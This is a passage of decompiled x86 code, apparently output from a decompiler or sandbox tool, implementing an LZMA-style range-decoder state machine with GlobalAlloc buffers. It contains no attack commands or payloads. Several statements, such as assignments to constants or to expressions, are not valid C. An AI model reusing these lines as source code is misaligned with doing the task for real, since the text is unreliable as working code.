									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
